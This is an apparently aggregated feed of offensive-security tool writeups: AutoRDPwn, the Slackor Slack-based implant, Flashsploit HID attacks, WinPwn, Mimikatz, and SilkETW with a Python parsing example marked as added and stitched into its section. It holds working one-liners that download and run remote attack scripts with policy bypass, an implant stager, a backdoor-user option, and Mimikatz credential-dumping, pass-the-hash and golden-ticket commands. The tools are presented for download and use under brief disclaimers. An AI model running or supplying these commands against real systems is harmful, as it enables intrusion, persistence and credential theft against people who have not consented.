AutoRDPwn v5.0 – The Shadow Attack Framework

AutoRDPwn is a post-exploitation framework created in Powershell, designed primarily to automate the Shadow attack on Microsoft Windows computers. This vulnerability (listed as a feature by Microsoft) allows a remote attacker to view his victim's desktop without his consent, and even control it on demand, using tools native to the operating system itself.

Thanks to the additional modules, it is possible to obtain a remote shell through Netcat, dump system hashes with Mimikatz, load a remote keylogger and much more. All this through a completely intuitive menu in seven different languages.

Additionally, it is possible to use it in a reverse shell through a series of parameters that are described in the usage section.

Requirements

Powershell 4.0 or higher

Changes

Version 5.0
• New logo completely redesigned from scratch
• Full translation in 7 languages: es, en, fr, de, it, ru, pt
• Remote execution through a reverse shell with UAC and AMSI Bypass
• Partial support from Linux (more information in the user guide)
• Improved remote execution (internet connection is no longer necessary on the victim)
• New section available: Backdoors and persistence
• New module available: Remote Keylogger
• New section available: Privilege escalation
• New module available: Obtain information from the operating system
• New module available: Search vulnerabilities with Sherlock
• New module available: Escalate privileges with PowerUp
• New section available: Other Modules
• New module available: Execute an external script
*The rest of the changes can be consulted in the CHANGELOG file

Use

This application can be used locally, remotely or to pivot between computers.

When used remotely in a reverse shell, it is necessary to use the following parameters:
-admin / -noadmin -> Depending on the permissions we have, we will use one or the other
-nogui -> This will avoid loading the menu and some colors, guaranteeing its functionality
-lang -> We will choose our language (English, Spanish, French, German, Italian, Russian or Portuguese)
-option -> As with the menu, we can choose how to launch the attack
-shadow -> We will decide if we want to see or control the remote device
-createuser -> This parameter is optional; the user AutoRDPwn (password: AutoRDPwn) will be created on the victim machine

Local execution on one line:
powershell -ep bypass "cd $env:temp ; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1"

Example of remote execution on one line:
powershell -ep bypass "cd $env:temp ; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1 -admin -nogui -lang English -option 4 -shadow control -createuser"

The detailed guide of use can be found at the following link:
https://darkbyte.net/autordpwn-la-guia-definitiva

Screenshots

Credits and Acknowledgments

This framework uses the following scripts and tools:
• Chachi-Enumerator by Luis Vacas -> https://github.com/Hackplayers/PsCabesha-tools
• Get-System by HarmJ0y & Matt Graeber -> https://github.com/HarmJ0y/Misc-PowerShell
• Invoke-DCOM by Steve Borosh -> https://github.com/rvrsh3ll/Misc-Powershell-Scripts
• Invoke-MetasploitPayload by Jared Haight -> https://github.com/jaredhaight/Invoke-MetasploitPayload
• Invoke-Phant0m by Halil Dalabasmaz -> https://github.com/hlldz/Invoke-Phant0m
• Invoke-PowerShellTcp by Nikhil "SamratAshok" Mittal -> https://github.com/samratashok/nishang
• Invoke-TheHash by Kevin Robertson -> https://github.com/Kevin-Robertson/Invoke-TheHash
• Mimikatz by Benjamin Delpy -> https://github.com/gentilkiwi/mimikatz
• PsExec by Mark Russinovich -> https://docs.microsoft.com/en-us/sysinternals/downloads/psexec
• RDP Wrapper by Stas'M Corp. -> https://github.com/stascorp/rdpwrap
• SessionGopher by Brandon Arvanaghi -> https://github.com/Arvanaghi/SessionGopher
And many more that do not fit here. Thanks to all of them and their excellent work.

Contact

This software does not offer any kind of guarantee. Its use is exclusive for educational environments and / or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it.

For more information, you can contact through info@darkbyte.net

Download AutoRDPwn

Link: http://feedproxy.google.com/~r/PentestTools/~3/zJ75MJYF2V8/autordpwn-v50-shadow-attack-framework.html

UPDATE: MITRE CALDERA 2.2.0

PenTestIT RSS Feed
If you remember, I wrote briefly about this automated adversary emulation system in my post titled – List of Adversary Emulation Tools. Sometime back, an update – the MITRE CALDERA 2.2.0 was released. A lot of changes have been made to create this updated version and as always, this version discusses the different updates made to
Read more about UPDATE: MITRE CALDERA 2.2.0
The post UPDATE: MITRE CALDERA 2.2.0 appeared first on PenTestIT.

Link: http://pentestit.com/update-mitre-caldera-2-2-0/

Slackor – A Golang Implant That Uses Slack As A Command And Control Server

A Golang implant that uses Slack as a command and control channel. This project was inspired by Gcat and Twittor.

This tool is released as a proof of concept. Be sure to read and understand the Slack App Developer Policy before creating any Slack apps.

Setup

Note: The server is written in Python 3.

For this to work you need:
• A Slack Workspace
• Register an app with the following permissions: channels:read, channels:history, channels:write, files:write:user, files:read
• Create a bot

This repo contains five files:
install.sh – Installs dependencies
setup.py – The script to create the Slack channels, database, and implant
server.py – The Slackor server, designed to be run on Linux
template.go – Template for the generated implant
requirements.txt – Python dependencies (installed automatically)

To get started:
1. Run install.sh
2. Run setup.py
3. Supply the OAuth Access Token and Bot User OAuth Access Token from your app

After running the script successfully, a file agent.exe will be created. It will be a 64-bit Go binary packed with UPX.

After starting server.py on a Linux host, execute agent.exe on your target Windows host.

Run the "stager" module to generate a one-liner and other droppers.

powershell.exe iwr [URL] -o C:\Users\Public\[NAME].exe; forfiles.exe /p c:\windows\system32 /m svchost.exe /c C:\Users\Public\[NAME]; timeout 2; del C:\Users\Public\[NAME].exe

This will execute Invoke-WebRequest (PS v3+) to download the payload, execute it using a LOLBin, and then delete itself once killed. This is a working example but the command can be tweaked to use another download method or execution method.

Usage

Type "help" or press [TAB] to see a list of available commands. Type "help [COMMAND]" to see a description of that command.

(Slackor)
help – Displays help menu
interact – Interact with an agent
list – List all registered agents
remove – Kill and remove an agent
revive – Sends a signal to all agents to re-register with the server
stager – Generates a one-liner to download and execute the implant
quit – Quit the program
wipefiles – Deletes all uploaded files out of Slack

Once an agent checks in, you can interact with it. Use "interact [AGENT]" to enter into an agent prompt. Type "help" or press [TAB] to see a list of available commands.

(Slackor:AGENT)
back – Return to the main menu
beacon – Change the amount of time between each check-in by an agent (default is 5 seconds)
bypassuac – Attempts to spawn a high integrity agent
cleanup – Removes persistence artifacts
clipboard – Retrieves the contents of the clipboard
defanger – Attempts to de-fang Windows Defender
download – Download a file from the agent to the Slackor server
duplicate – Causes the agent to spawn another invocation of itself
getsystem – Spawns an agent as NT AUTHORITY\SYSTEM
help – Displays help menu
keyscan – Starts a keylogger on the agent
kill – Kill the agent
minidump – Dumps memory from lsass.exe and downloads it
persist – Creates persistence by implanting a binary in an ADS
samdump – Attempts to dump the SAM file for offline hash extraction
screenshot – Takes a screenshot of the desktop and retrieves it
shellcode – Executes x64 raw shellcode
sleep – Cause the agent to sleep once (enter time in seconds)
sysinfo – Displays the current user, OS version, system architecture, and number of CPU cores
upload – Upload a file to the agent from the Slackor server
wget – Pull down arbitrary files over HTTP/HTTPS

OPSEC Considerations

Command output and downloaded files are AES encrypted in addition to TLS transport encryption.

Modules will warn you before performing tasks that write to disk.

When executing shell commands, take note that cmd.exe will be executed. This may be monitored on the host. Here are several OPSEC safe commands that will NOT execute cmd.exe:
cat – prints file content
cd – change directory
hostname – Displays the name of the host
ifconfig – Displays interface information
ls – list directory contents
mkdir – Creates a directory
pwd – prints the current working directory
rm – removes a file
rmdir – removes a directory
whoami / getuid – prints the current user

Credits

https://github.com/EgeBalci – Functions adapted from HERCULES and EGESPLOIT
https://github.com/SaturnsVoid – Keylogger adapted from GoBot2
https://github.com/vyrus001 – x64 shellcode execution shell
GoCrypto functions adopted from https://www.golang123.com/topic/1686
Persistence idea from Enigma0x3
Minidump adopted from Merlin, credit to C-Sto
Screenshot code from kbinani
Clipboard code from atotto
Stager generator from hlldz
UAC bypass by winscripting.blog
Lulzbin find by @vector_sec
Countless threads on StackOverflow
Thanks to impacket for dumping hashes from SAM/SYS/SECURITY reg hives.
LSASS dump credential extraction made possible using pypykatz by skelsec

Future goals

DOSfuscation
Reflectively load DLL/PE – https://github.com/vyrus001/go-mimikatz
Execute C# assemblies in memory – https://github.com/lesnuages/go-execute-assembly
Source code obfuscation https://github.com/unixpickle/gobfuscate

FAQ:

Is this safe to use for red teams/pentesting?
Yes, given some conditions. While the data is encrypted in transit, the agent contains the key for decryption. Anyone who acquires a copy of the agent could reverse engineer it and extract the API keys and the AES secret key. Anyone who compromises or otherwise gains access to the workspace would be able to retrieve all data within it. For this reason, it is not recommended to re-use infrastructure against multiple organizations.

What about Mimikatz?
The implant does not have in-memory password dumping functionality. If you need logonPasswords, you can try the following:
(Slackor:AGENT) minidump
This will automatically extract passwords with pypykatz. Alternatively, you can use Mimikatz on Windows.
>mimikatz.exe
mimikatz # sekurlsa::Minidump lsassdump.dmp
mimikatz # sekurlsa::logonPasswords

Is it cross-platform?
Not yet. It has not been fully tested on a variety of systems. The server was designed to run on Kali Linux and the agent on Windows 10.

How well does it scale?
Scalability is limited by the Slack API. If you have multiple agents, consider increasing the beacon interval of beacons not in use.

Is it vulnerable to standard beacon analysis?
Currently each beacon has 20% jitter built in, and beacon times can be customized. Agent check-in request and response packets will be about the same size each time as long as no new commands are received.

Why did you do [x] when a better way to do it is [y]?
I tried my best. PRs are encouraged :)

It gets caught by AV!
The built-in HTA stager is created by SpookFlare which is based on Demiguise. If you want your droppers to not get snagged you probably want to go custom. The built-in droppers are just there to get you started.

Download Slackor

Link: http://feedproxy.google.com/~r/PentestTools/~3/SzRtcRYVjzE/slackor-golang-implant-that-uses-slack.html

Flashsploit – Exploitation Framework For ATtiny85 Based HID Attacks

Flashsploit is an Exploitation Framework for Attacks using ATtiny85 HID Devices such as the Digispark USB Development Board. Flashsploit generates Arduino IDE Compatible (.ino) Scripts based on User Input and then Starts a Listener in Metasploit-Framework if Required by the Script. In summary: Automatic Script Generation with Automated msfconsole.

Features

TODO: Add Linux and OSX Scripts

Windows

Data Exfiltration
• Extract all WiFi Passwords and Upload an XML to SFTP Server
• Extract Network Configuration Information of Target System and Upload to SFTP Server
• Extract Passwords and Other Critical Information using Mimikatz and Upload to SFTP Server

Reverse Shells
• Get Reverse Shell by Abusing Microsoft HTML Apps (mshta)
• Get Reverse Shell by Abusing Certification Authority Utility (certutil)
• Get Reverse Shell by Abusing Windows Script Host (cscript)
• Get Reverse Shell by Abusing Windows Installer (msiexec)
• Get Reverse Shell by Abusing Microsoft Register Server Utility (regsvr32)

Miscellaneous
• Change Wallpaper of Target Machine
• Make Windows Unresponsive using a .bat Script (100% CPU and RAM usage)
• Drop and Execute a File of your Choice, a ransomware maybe? ;)
• Disable Windows Defender Service on Target Machine

Tested on
• Kali Linux 2019.2
• BlackArch Linux

Dependencies

Flashsploit Depends upon 4 Packages which are Generally Pre-installed in Major Pentest OS:
• Metasploit-Framework
• Python 3
• SFTP
• PHP

If you think I should still make an Install Script, Open an issue.

Usage

git clone https://github.com/thewhiteh4t/flashsploit.git
cd flashsploit
python3 flashsploit.py

Download Flashsploit

Link: http://feedproxy.google.com/~r/PentestTools/~3/lPG04RLt5rk/flashsploit-exploitation-framework-for.html

UPDATE: MITRE CALDERA 2.0

PenTestIT RSS Feed
I read a tweet about two days ago and today, MITRE CALDERA 2.0 is out already! If you remember, I wrote briefly about this automated adversary emulation system in my post titled – List of Adversary Emulation Tools. This is a major update and this post is about the changes I personally see in this
Read more about UPDATE: MITRE CALDERA 2.0
The post UPDATE: MITRE CALDERA 2.0 appeared first on PenTestIT.

Link: http://pentestit.com/update-mitre-caldera-2-0/

SilkETW – Flexible C# Wrapper For ETW (Event Tracing for Windows)

SilkETW is a flexible C# wrapper for ETW. It is meant to abstract away the complexities of ETW and give people a simple interface to perform research and introspection. While SilkETW has obvious defensive (and offensive) applications, it is primarily a research tool in its current state.

For easy consumption, output data is serialized to JSON. The JSON data can either be analyzed locally using PowerShell or shipped off to 3rd party infrastructure such as Elasticsearch.

Implementation Details

Libraries

SilkETW is built on .Net v4.5 and uses a number of 3rd party libraries, as shown below. Please see LICENSE-3RD-PARTY for further details.

ModuleId                                  Version  LicenseUrl
--------                                  -------  ----------
McMaster.Extensions.CommandLineUtils      2.3.2    https://licenses.nuget.org/Apache-2.0
Microsoft.Diagnostics.Tracing.TraceEvent  2.0.36   https://github.com/Microsoft/perfview/blob/master/LICENSE.TXT
Newtonsoft.Json                           12.0.1   https://licenses.nuget.org/MIT
System.ValueTuple                         4.4.0    https://github.com/dotnet/corefx/blob/master/LICENSE.TXT
YaraSharp                                 1.3.1    https://github.com/stellarbear/YaraSharp/blob/master/LICENSE

Command Line Options

Command line usage is fairly straightforward and user input is validated in the execution prologue. See the image below for further details.

JSON Output Structure

The JSON output, prior to serialization, is formatted according to the following C# struct.

public struct EventRecordStruct
{
    public Guid ProviderGuid;
    public List<string> YaraMatch;
    public string ProviderName;
    public string EventName;
    public TraceEventOpcode Opcode;
    public string OpcodeName;
    public DateTime TimeStamp;
    public int ThreadID;
    public int ProcessID;
    public string ProcessName;
    public int PointerSize;
    public int EventDataLength;
    public Hashtable XmlEventData;
}

Note that, depending on the provider and the event type, you will have variable data in the XmlEventData hash table. Sample JSON output can be seen below for "Microsoft-Windows-Kernel-Process" -> "ThreadStop/Stop".

{
  "ProviderGuid": "22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716",
  "YaraMatch": [],
  "ProviderName": "Microsoft-Windows-Kernel-Process",
  "EventName": "ThreadStop/Stop",
  "Opcode": 2,
  "OpcodeName": "Stop",
  "TimeStamp": "2019-03-03T17:58:14.2862348+00:00",
  "ThreadID": 11996,
  "ProcessID": 8416,
  "ProcessName": "",
  "PointerSize": 8,
  "EventDataLength": 76,
  "XmlEventData": {
    "FormattedMessage": "Thread 11,996 (in Process 8,416) stopped. ",
    "StartAddr": "0x7fffe299a110",
    "ThreadID": "11,996",
    "UserStackLimit": "0x3d632000",
    "StackLimit": "0xfffff38632d39000",
    "MSec": "560.5709",
    "TebBase": "0x91c000",
    "CycleTime": "4,266,270",
    "ProcessID": "8,416",
    "PID": "8416",
    "StackBase": "0xfffff38632d40000",
    "SubProcessTag": "0",
    "TID": "11996",
    "ProviderName": "Microsoft-Windows-Kernel-Process",
    "PName": "",
    "UserStackBase": "0x3d640000",
    "EventName": "ThreadStop/Stop",
    "Win32StartAddr": "0x7fffe299a110"
  }
}

Usage

Filter data in PowerShell

You can import JSON output from SilkETW in PowerShell using the following simple function.

function Get-SilkData {
    param($Path)
    $JSONObject = @()
    Get-Content $Path | ForEach-Object {
        $JSONObject += $_ | ConvertFrom-Json
    }
    $JSONObject
}

In the example below we will collect process event data from the Kernel provider and use image loads to identify Mimikatz execution. We can collect the required data with the following command.

SilkETW.exe -t kernel -kk ImageLoad -ot file -p C:\Users\b33f\Desktop\mimikatz.json

With data in hand it is easy to sort, grep and filter for the properties we are interested in.

Yara

SilkETW includes Yara functionality to filter or tag event data. Again, this has obvious defensive capabilities but it can just as easily be used to augment your ETW research.

In this example we will use the following Yara rule to detect Seatbelt execution in memory through Cobalt Strike's execute-assembly.

rule Seatbelt_GetTokenInformation
{
    strings:
        $s1 = "ManagedInteropMethodName=GetTokenInformation" ascii wide nocase
        $s2 = "TOKEN_INFORMATION_CLASS" ascii wide nocase
        $s3 = /bool\(native int,valuetype \w+\.\w+\/\w+,native int,int32,int32&/
        $s4 = "locals (int32,int64,int64,int64,int64,int32& pinned,bool,int32)" ascii wide nocase
    condition:
        all of ($s*)
}

We can start collecting .Net ETW data with the following command. The "-yo" option here indicates that we should only write Yara matches to disk!

SilkETW.exe -t user -pn Microsoft-Windows-DotNETRuntime -uk 0x2038 -l verbose -y C:\Users\b33f\Desktop\yara -yo matches -ot file -p C:\Users\b33f\Desktop\yara.json

We can see at runtime that our Yara rule was hit.

Note also that we are only capturing a subset of the "Microsoft-Windows-DotNETRuntime" events (0x2038), specifically: JitKeyword, InteropKeyword, LoaderKeyword and NGenKeyword.

Changelog

For details on version specific changes, please refer to the Changelog.

Download SilkETW
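The Get-SilkData helper and the image-load workflow above, carried off-box in Python as an added example (not SilkETW's own code): it parses the JSON-lines output into the struct shown, normalises the thousands-grouped strings SilkETW places in XmlEventData so they compare equal to the typed struct fields, and filters records by provider, event name and a field predicate. The "Image/Load" event name, its "FileName" field and the second sample record are assumptions made for illustration.

```python
"""Off-box parsing and filtering of SilkETW JSON output.

Added example, not SilkETW's own code.  SilkETW writes one EventRecordStruct
per line.  The struct's fixed fields are typed, but every value inside
XmlEventData is a display string, some with thousands separators ("11,996"),
so they are normalised here before being compared with struct-level fields.
"""
import json
import re
from typing import Any, Callable, Dict, Iterable, List, Optional

Event = Dict[str, Any]

# Constructed sample, one record per line.  Line 1 is the page's
# ThreadStop/Stop record, trimmed.  Line 2 is a HYPOTHETICAL kernel ImageLoad
# record: the "Image/Load" event name, the "FileName" field and the all-zero
# GUID are assumptions for illustration, not output captured from SilkETW.
SAMPLE_JSONL = r'''
{"ProviderGuid":"22fb2cd6-0e7b-422b-a0c7-2fad1fd0e716","YaraMatch":[],"ProviderName":"Microsoft-Windows-Kernel-Process","EventName":"ThreadStop/Stop","Opcode":2,"OpcodeName":"Stop","TimeStamp":"2019-03-03T17:58:14.2862348+00:00","ThreadID":11996,"ProcessID":8416,"ProcessName":"","PointerSize":8,"EventDataLength":76,"XmlEventData":{"StartAddr":"0x7fffe299a110","ThreadID":"11,996","MSec":"560.5709","CycleTime":"4,266,270","ProcessID":"8,416","PID":"8416","TID":"11996","SubProcessTag":"0"}}
{"ProviderGuid":"00000000-0000-0000-0000-000000000000","YaraMatch":[],"ProviderName":"Windows Kernel","EventName":"Image/Load","Opcode":10,"OpcodeName":"Load","TimeStamp":"2019-03-03T17:58:15.0000000+00:00","ThreadID":4242,"ProcessID":8416,"ProcessName":"powershell","PointerSize":8,"EventDataLength":120,"XmlEventData":{"ProcessID":"8,416","FileName":"C:\\Users\\b33f\\Desktop\\mimikatz.exe","ImageBase":"0x7ff6a0000000"}}
'''

# Decimal integers as SilkETW renders them: "8416", "8,416", "4,266,270".
_GROUPED_INT = re.compile(r"-?\d{1,3}(?:,\d{3})+|-?\d+")

def normalise(value: Any) -> Any:
    """Turn a thousands-grouped decimal string back into an int; leave hex
    addresses ("0x7fff..."), floats ("560.5709") and free text untouched."""
    if isinstance(value, str) and _GROUPED_INT.fullmatch(value):
        return int(value.replace(",", ""))
    return value

def load_events(lines: Iterable[str]) -> List[Event]:
    """Parse one record per non-empty line and normalise its XmlEventData."""
    events = []
    for raw in lines:
        raw = raw.strip()
        if not raw:
            continue
        rec = json.loads(raw)
        rec["XmlEventData"] = {k: normalise(v)
                               for k, v in (rec.get("XmlEventData") or {}).items()}
        events.append(rec)
    return events

def filter_events(events: Iterable[Event], provider: Optional[str] = None,
                  event_name: Optional[str] = None,
                  where: Optional[Callable[[Dict[str, Any]], bool]] = None) -> List[Event]:
    """Keep records matching ProviderName / EventName and, if given, a
    predicate over the normalised XmlEventData dictionary."""
    out = []
    for ev in events:
        if provider is not None and ev.get("ProviderName") != provider:
            continue
        if event_name is not None and ev.get("EventName") != event_name:
            continue
        if where is not None and not where(ev["XmlEventData"]):
            continue
        out.append(ev)
    return out

def image_loads_matching(events: Iterable[Event], needle: str) -> List[Event]:
    """The page's workflow: kernel ImageLoad records whose loaded image path
    contains needle (case-insensitive).  "Image/Load" and "FileName" are the
    assumed event name and field (see the note on SAMPLE_JSONL)."""
    needle = needle.lower()
    return filter_events(events, event_name="Image/Load",
                         where=lambda d: needle in str(d.get("FileName", "")).lower())

def cross_check(events: Iterable[Event]) -> List[tuple]:
    """Report records whose provider-rendered ProcessID / ThreadID disagree
    with the struct-level fields.  Without normalise() every record would be
    flagged, because "8,416" != 8416."""
    problems = []
    for ev in events:
        data = ev["XmlEventData"]
        for field in ("ProcessID", "ThreadID"):
            if field in data and data[field] != ev[field]:
                problems.append((ev["TimeStamp"], field, data[field], ev[field]))
    return problems

if __name__ == "__main__":
    evs = load_events(SAMPLE_JSONL.splitlines())
    for ev in image_loads_matching(evs, "mimikatz"):
        print("image load in PID", ev["ProcessID"], ":", ev["XmlEventData"]["FileName"])
    print("cross-check problems:", cross_check(evs))
```

The same normalisation is what a PowerShell or Elasticsearch pipeline needs before joining XmlEventData fields against the struct's ProcessID and ThreadID.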

Link: http://feedproxy.google.com/~r/PentestTools/~3/BJmvoNfqSg4/silketw-flexible-c-wrapper-for-etw.html

Mimikatz v2.2.0 – A Post-Exploitation Tool to Extract Plaintexts Passwords, Hash, PIN Code from Memory

mimikatz is a tool I've made to learn C and make some experiments with Windows security. It's now well known to extract plaintext passwords, hashes, PIN codes and Kerberos tickets from memory. mimikatz can also perform pass-the-hash, pass-the-ticket or build Golden tickets.

But that's not all! Crypto, Terminal Server, Events, ... lots of information in the GitHub Wiki https://github.com/gentilkiwi/mimikatz/wiki or on http://blog.gentilkiwi.com (in French, yes).

If you don't want to build it, binaries are available on https://github.com/gentilkiwi/mimikatz/releases

Quick usage

log
privilege::debug

sekurlsa
sekurlsa::logonpasswords
sekurlsa::tickets /export
sekurlsa::pth /user:Administrateur /domain:winxp /ntlm:f193d757b4d487ab7e5a3743f038f713 /run:cmd

kerberos
kerberos::list /export
kerberos::ptt c:\chocolate.kirbi
kerberos::golden /admin:administrateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /ticket:chocolate.kirbi

crypto
crypto::capi
crypto::cng
crypto::certificates /export
crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE
crypto::keys /export
crypto::keys /machine /export

vault & lsadump
vault::cred
vault::list
token::elevate
vault::cred
vault::list
lsadump::sam
lsadump::secrets
lsadump::cache
token::revert
lsadump::dcsync /user:domain\krbtgt /domain:lab.local

Build

mimikatz is in the form of a Visual Studio Solution and a WinDDK driver (optional for main operations), so prerequisites are:
• for mimikatz and mimilib: Visual Studio 2010, 2012 or 2013 for Desktop (2013 Express for Desktop is free and supports x86 & x64 – http://www.microsoft.com/download/details.aspx?id=44914)
• for mimikatz driver, mimilove (and ddk2003 platform): Windows Driver Kit 7.1 (WinDDK) – http://www.microsoft.com/download/details.aspx?id=11800

mimikatz uses SVN for source control, but is now available with GIT too! You can use any tools you want to sync, even the GIT incorporated in Visual Studio 2013 =)

Synchronize!

GIT URL is: https://github.com/gentilkiwi/mimikatz.git
SVN URL is: https://github.com/gentilkiwi/mimikatz/trunk
ZIP file is: https://github.com/gentilkiwi/mimikatz/archive/master.zip

Build the solution

After opening the solution, Build / Build Solution (you can change architecture)
mimikatz is now built and ready to be used! (Win32 / x64)
You can have error MSB3073 about _build_.cmd and mimidrv; it's because the driver cannot be built without Windows Driver Kit 7.1 (WinDDK), but mimikatz and mimilib are OK.

ddk2003

With this optional MSBuild platform, you can use the WinDDK build tools, and the default msvcrt runtime (smaller binaries, no dependencies).
For this optional platform, Windows Driver Kit 7.1 (WinDDK) – http://www.microsoft.com/download/details.aspx?id=11800 and Visual Studio 2010 are mandatory, even if you plan to use Visual Studio 2012 or 2013 after.
Follow instructions:
http://blog.gentilkiwi.com/programmation/executables-runtime-defaut-systeme
http://blog.gentilkiwi.com/cryptographie/api-systemfunction-windows#winheader

Licence

CC BY 4.0 licence – https://creativecommons.org/licenses/by/4.0/

mimikatz needs coffee to be developed:
ETH: 0x3a56af999b5e68f9e6e0a7dce1833efefad5b470
BTC: 1C6bubazp9xq3BfYiHvsqP1sEhFYykUDo5
PayPal: https://www.paypal.me/delpy/

Author

Benjamin DELPY gentilkiwi, you can contact me on Twitter ( @gentilkiwi ) or by mail ( benjamin [at] gentilkiwi.com )
DCSync function in lsadump module was co-written with Vincent LE TOUX, you can contact him by mail ( vincent.letoux [at] gmail.com ) or visit his website ( http://www.mysmartlogon.com )

This is a personal development, please respect its philosophy and don't use it for bad things!

Download Mimikatz

Link: http://www.kitploit.com/2019/04/mimikatz-v220-post-exploitation-tool-to.html

WinPwn – Automation For Internal Windows Penetrationtest

In many past internal penetration tests I often had problems with the existing Powershell Recon / Exploitation scripts due to missing proxy support. For this reason I wrote my own script with automatic proxy recognition and integration. The script is mostly based on other well-known large offensive security Powershell projects. I only load them one after the other into RAM via IEX Downloadstring and partially automate the execution to save time.

Yes, it is not C# and it may be flagged by antivirus solutions. Windows Defender for example blocks some of the known scripts/functions.

Different local recon modules, domain recon modules, privilege escalation and exploitation modules. Any suggestions, feedback and comments are welcome!

Just import the modules with "Import-Module .\WinPwn_v0.7.ps1" or with iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/SecureThisShit/WinPwn/master/WinPwn_v0.7.ps1')

Functions available after import:
WinPwn -> Guides the user through all functions/modules with simple questions.
Inveigh -> Executes Inveigh in a new console window (https://github.com/Kevin-Robertson/Inveigh), SMB-Relay attacks with session management afterwards
sessionGopher -> Executes SessionGopher and asks for parameters (https://github.com/Arvanaghi/SessionGopher)
Mimikatzlocal -> Executes Invoke-WCMDump and Invoke-Mimikatz (https://github.com/PowerShellMafia/PowerSploit)
localreconmodules -> Executes Get-Computerdetails and Just another Windows Privilege escalation script + Winspect (https://github.com/PowerShellMafia/PowerSploit, https://github.com/A-mIn3/WINspect, https://github.com/411Hall/JAWS)
JAWS -> Just another Windows Privilege Escalation script gets executed
domainreconmodules -> Different Powerview situational awareness functions get executed and the output stored on disk. In addition a userlist for DomainPasswordSpray gets stored on disk. An AD-Report is generated in CSV files (or XLS if Excel is installed) with ADRecon. (https://github.com/sense-of-security/ADRecon, https://github.com/PowerShellMafia/PowerSploit, https://github.com/dafthack/DomainPasswordSpray)
Privescmodules -> Executes different privesc scripts in memory (Sherlock https://github.com/rasta-mouse/Sherlock, PowerUp, GPP-Files, WCMDump)
lazagnemodule -> Downloads and executes lazagne.exe (if not detected by AV) (https://github.com/AlessandroZ/LaZagne)
latmov -> Searches for systems with admin access in the domain for lateral movement. Mass-Mimikatz can be used afterwards for the found systems. DomainPasswordSpray for new credentials can also be used here.
empirelauncher -> Launch PowerShell Empire oneliner on remote systems (https://github.com/EmpireProject/Empire)
shareenumeration -> Invoke-Filefinder and Invoke-Sharefinder from Powerview (Powersploit)
groupsearch -> Get-DomainGPOUserLocalGroupMapping – find systems where you have admin access or RDP access to via Group Policy Mapping (Powerview / Powersploit)
Kerberoasting -> Executes Invoke-Kerberoast in a new window and stores the hashes for later cracking
isadmin -> Checks for local admin access on the local system
Sharphound -> Downloads Sharphound and collects information for the Bloodhound DB
adidnswildcard -> Create an Active Directory-Integrated DNS wildcard record and run Inveigh for mass hash gathering. (https://blog.netspi.com/exploiting-adidns/#wildcard)

The "oBEJHzXyARrq.exe" executable is an obfuscated version of jaredhaight's PSAttack tool for Applocker/PS-Restriction bypass (https://github.com/jaredhaight/PSAttack).

Todo:
• Get the scripts from my own creds repository (https://github.com/SecureThisShit/Creds) to be independent from changes in the original repositories.
• Proxy options via PAC-file are not correctly found at the moment.

Legal disclaimer:
Usage of WinPwn for attacking targets without prior mutual consent is illegal. It's the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program. Only use for educational purposes.

Download WinPwn

Link: http://feedproxy.google.com/~r/PentestTools/~3/9lPHNu1cvU8/winpwn-automation-for-internal-windows.html

AutoRDPwn v4.8 – The Shadow Attack Framework

AutoRDPwn is a script created in Powershell and designed to automate the Shadow attack on Microsoft Windows computers. This vulnerability allows a remote attacker to view his victim's desktop without his consent, and even control it on request. For its correct operation, it is necessary to comply with the requirements described in the user guide.

Requirements

Powershell 4.0 or higher

Changes

Version 4.8
• Compatibility with Powershell 4.0
• Automatic copy of the content to the clipboard (passwords, hashes, dumps, etc.)
• Automatic exclusion in Windows Defender (4 different methods)
• Remote execution without password for PSexec, WMI and Invoke-Command
• New available attack: DCOM Passwordless Execution
• New available module: Remote Access / Metasploit Web Delivery
• New module available: Remote VNC Server (designed for legacy environments)
• Autocomplete the host, user and password fields by pressing Enter
• It is now possible to run the tool without administrator privileges with the -noadmin parameter
*The rest of the changes can be consulted in the CHANGELOG file

Use

This application can be used locally, remotely or to pivot between computers. Thanks to the additional modules, it is possible to dump hashes and passwords, obtain a remote shell, upload and download files or even recover the history of RDP connections or passwords of wireless networks.

One line execution:
powershell -ep bypass "cd $env:temp ; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1"

The detailed guide of use can be found at the following link:
https://darkbyte.net/autordpwn-la-guia-definitiva

Screenshots

Credits and Acknowledgments
• Mark Russinovich for his tool PsExec -> https://docs.microsoft.com/en-us/sysinternals/downloads/psexec
• HarmJ0y & Matt Graeber for their script Get-System -> https://github.com/HarmJ0y/Misc-PowerShell
• Stas'M Corp. for its tool RDP Wrapper -> https://github.com/stascorp/rdpwrap
• Kevin Robertson for his script Invoke-TheHash -> https://github.com/Kevin-Robertson/Invoke-TheHash
• Benjamin Delpy for his tool Mimikatz -> https://github.com/gentilkiwi/mimikatz
• Halil Dalabasmaz for his script Invoke-Phant0m -> https://github.com/hlldz/Invoke-Phant0m

Contact

This software does not offer any kind of guarantee. Its use is exclusive for educational environments and / or security audits with the corresponding consent of the client. I am not responsible for its misuse or for any possible damage caused by it.

For more information, you can contact through info@darkbyte.net

Download AutoRDPwn

Link: http://www.kitploit.com/2019/03/autordpwn-v48-shadow-attack-framework.html

RDP Servers, Mimikatz, & LibreOffice – Hack Naked News #206

This week, RDP Servers Can Hack Client Devices, Roughly 500,000 Ubiquiti devices may be affected by a flaw already exploited in the wild, Crypto exchange in limbo after the founder dies with password, Home DNA kit company says it's working with the FBI, Outlaw Shellbot infects Linux servers to mine for Monero, Apple's […]
The post RDP Servers, Mimikatz, & LibreOffice – Hack Naked News #206 appeared first on Security Weekly.

Link: http://feedproxy.google.com/~r/securityweekly/Lviv/~3/6ydFfgEPIFk/